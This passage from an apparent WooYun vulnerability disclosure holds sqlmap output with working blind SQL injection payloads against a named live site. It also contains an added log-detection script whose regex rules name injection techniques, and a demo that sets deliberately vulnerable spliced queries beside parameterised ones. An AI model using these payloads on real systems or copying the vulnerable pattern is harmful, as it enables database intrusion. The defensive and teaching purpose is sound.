injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] N
[04:16:53] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1)
[04:16:53] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[04:18:47] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[04:19:10] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[04:19:33] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[04:19:56] [INFO] target URL appears to be UNION injectable with 46 columns
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[04:29:52] [INFO] testing 'MySQL UNION query (49) - 62 to 80 columns'
[04:30:15] [INFO] testing 'MySQL UNION query (49) - 82 to 100 columns'
[04:30:38] [INFO] testing 'Generic UNION query (49) - 1 to 20 columns'
[04:32:30] [INFO] testing 'Generic UNION query (49) - 22 to 40 columns'
[04:32:53] [INFO] testing 'Generic UNION query (49) - 42 to 60 columns'
[04:33:16] [INFO] testing 'Generic UNION query (49) - 62 to 80 columns'
[04:33:39] [INFO] testing 'Generic UNION query (49) - 82 to 100 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 675 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Find_pwd/check_user_name?user_name=
test') AND 9050=9050 AND ('deOm'='deOm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Find_pwd/check_user_name?user_name=
test') AND SLEEP(10) AND ('CtNz'='CtNz
---
[04:35:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.11

Since these are time-based injections it was far too slow, and there seemed to be some problems further on, so I did not continue!
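
From the defending side, the sqlmap runs above leave a recognisable trail in the web server's access log. The following Python script is an added example (not part of the original report): it parses constructed combined-format log lines that mirror the payload shapes sqlmap produced against this site (SLEEP, BENCHMARK, UNION SELECT, numeric and string tautologies) and flags them, along with the sqlmap User-Agent and high per-client request counts like the 83 to 1254 requests per parameter seen here. The log lines, IP addresses and the burst threshold are constructed for illustration.

```python
"""Spot the payload shapes from this report in web-server access logs.

Added example, not part of the original WooYun report. The log lines are
constructed (Apache/nginx combined format) to mirror sqlmap's payloads
above; IP addresses, timestamps and the burst threshold are illustrative.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample: one scanning client (203.0.113.7) and one normal client.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Nov/2015:22:20:35 +0800] "GET /index.php/Loan/index/it_id/2 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [08/Nov/2015:22:24:47 +0800] "GET /index.php/Loan/index/it_id/2%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [08/Nov/2015:20:47:18 +0800] "GET /index.php/Loan/index/rm_id/2%20AND%208936=BENCHMARK(10000000,MD5(0x6c66665a)) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Nov/2015:03:17:26 +0800] "GET /index.php/Public/exchange_city/code/-1362')%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x716f7a6971,0x63557866796e487a6c4b,0x7174727071),NULL,NULL,NULL%23 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Nov/2015:03:33:58 +0800] "GET /index.php/Register/examimgUserName?user_name=test')%20AND%206888=6888%20AND%20('qZvD'='qZvD HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.20 - - [09/Nov/2015:09:00:01 +0800] "GET /index.php/Loan/index/it_id/2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [09/Nov/2015:09:00:05 +0800] "GET /index.php/Register/examimgUserName?user_name=alice HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Rules run over the URL-decoded, upper-cased request path. Each one maps to a
# technique sqlmap reported against this site.
RULES = [
    ("time-based: SLEEP()",              re.compile(r"\bSLEEP\s*\(")),
    ("time-based: BENCHMARK()",          re.compile(r"\bBENCHMARK\s*\(\s*\d{5,}")),
    ("union-based: UNION SELECT",        re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b")),
    ("boolean-based: numeric tautology", re.compile(r"\b(?:AND|OR)\s*\(?\s*(\d+)\s*=\s*\1\b")),
    ("boolean-based: string tautology",  re.compile(r"'([A-Z0-9]+)'\s*=\s*'\1")),
]
SCANNER_UA = re.compile(r"sqlmap", re.I)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Decode twice so a double-encoded payload cannot slip past a single decode.
    rec["decoded"] = unquote_plus(unquote_plus(rec["path"]))
    return rec


def classify(decoded_path):
    """Return the names of all rules matching a URL-decoded request path."""
    upper = decoded_path.upper()
    return [name for name, rx in RULES if rx.search(upper)]


def analyse(log_text, burst_threshold=50):
    """Return payload findings, clients with a scanner User-Agent, and per-IP bursts."""
    findings, per_ip, scanner_ips = [], Counter(), set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        per_ip[rec["ip"]] += 1
        if SCANNER_UA.search(rec["ua"]):
            scanner_ips.add(rec["ip"])
        for rule in classify(rec["decoded"]):
            findings.append((rec["ip"], rule, rec["decoded"]))
    # sqlmap needed 83 to 1254 requests per parameter in this report, so a high
    # request count from one client is a cheap secondary signal.
    bursts = {ip: n for ip, n in per_ip.items() if n >= burst_threshold}
    return {"findings": findings, "scanner_ips": scanner_ips, "bursts": bursts}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG, burst_threshold=5)
    for ip, rule, path in result["findings"]:
        print(f"{ip:15} {rule:36} {path[:70]}")
    print("scanner UAs from:", sorted(result["scanner_ips"]))
    print("bursty clients:", result["bursts"])
```

The User-Agent check only catches an unmodified sqlmap; the payload rules and the request-count signal do not depend on it.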

Proof of vulnerability:

As above.

Remediation:

Fix by filtering the input.
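
To make that fix concrete, here is an added example (not the site's own code), written in Python with sqlite3 standing in for the PHP/MySQL back end so it runs offline: a vulnerable query that splices the it_id route segment and the user_name value into SQL text exactly as the payloads above require, beside a hardened version that allow-lists numeric route parameters and binds user_name as a query parameter. The table names, rows and length limit are constructed assumptions.

```python
"""Vulnerable versus hardened handling of the parameters named in this report.

Added example, not the site's own code. Python's sqlite3 stands in for the
PHP/MySQL back end so it runs offline; table names, rows and the length
limit are constructed for the demonstration.
"""
import re
import sqlite3

# Payloads quoted from the sqlmap output above (the application supplies the
# closing parenthesis/quote, which is why they end unbalanced).
IT_ID_TAUTOLOGY = "-2701) OR (6372=6372) AND (5532=5532"
USER_TRUE = "test') AND 6888=6888 AND ('qZvD'='qZvD"
USER_FALSE = "test') AND 6888=6889 AND ('qZvD'='qZvD"   # constructed false branch


def make_db():
    """In-memory stand-in for the site's database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE loan (it_id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO loan VALUES (1, 'loan one'), (2, 'loan two'), (3, 'loan three');
        CREATE TABLE member (user_name TEXT PRIMARY KEY, email TEXT);
        INSERT INTO member VALUES ('test', 'test@example.com'), ('alice', 'alice@example.com');
    """)
    return conn


# --- vulnerable pattern: request data spliced into the SQL text ----------------

def loan_by_id_vulnerable(conn, it_id):
    # The it_id route segment lands inside the WHERE clause, so a tautology
    # widens the result set and SLEEP()/BENCHMARK() would execute as SQL.
    sql = "SELECT it_id, title FROM loan WHERE (it_id = %s)" % it_id
    return conn.execute(sql).fetchall()


def member_by_name_vulnerable(conn, user_name):
    # Same defect for the quoted user_name checked by examimgUserName and
    # check_user_name: the value closes the quote and appends conditions, and
    # the row count becomes the true/false oracle behind boolean-based blind.
    sql = "SELECT user_name, email FROM member WHERE (user_name = ('%s'))" % user_name
    return conn.execute(sql).fetchall()


# --- hardened pattern: validate the shape, then bind values as parameters -----

ROUTE_INT = re.compile(r"[0-9]{1,10}")  # allow-list: short run of decimal digits


def parse_route_int(value):
    """Reject anything but a short decimal integer before it nears the database."""
    if not isinstance(value, str) or ROUTE_INT.fullmatch(value) is None:
        raise ValueError("invalid numeric route parameter: %r" % (value,))
    return int(value)


def loan_by_id_safe(conn, it_id):
    sql = "SELECT it_id, title FROM loan WHERE it_id = ?"
    return conn.execute(sql, (parse_route_int(it_id),)).fetchall()


def member_by_name_safe(conn, user_name):
    # Bound parameters travel as data and are never parsed as SQL: quotes,
    # AND/OR and SLEEP() inside the value cannot change the query's structure.
    sql = "SELECT user_name, email FROM member WHERE user_name = ?"
    return conn.execute(sql, (user_name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", loan_by_id_vulnerable(db, IT_ID_TAUTOLOGY))  # all 3 rows
    print("vulnerable, true/false oracle:",
          len(member_by_name_vulnerable(db, USER_TRUE)),
          len(member_by_name_vulnerable(db, USER_FALSE)))                        # 1 0
    print("safe, user_name payload as data:", member_by_name_safe(db, USER_TRUE))  # []
    try:
        loan_by_id_safe(db, IT_ID_TAUTOLOGY)
    except ValueError as exc:
        print("safe, rejected:", exc)
```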

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-11-21 20:58

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None
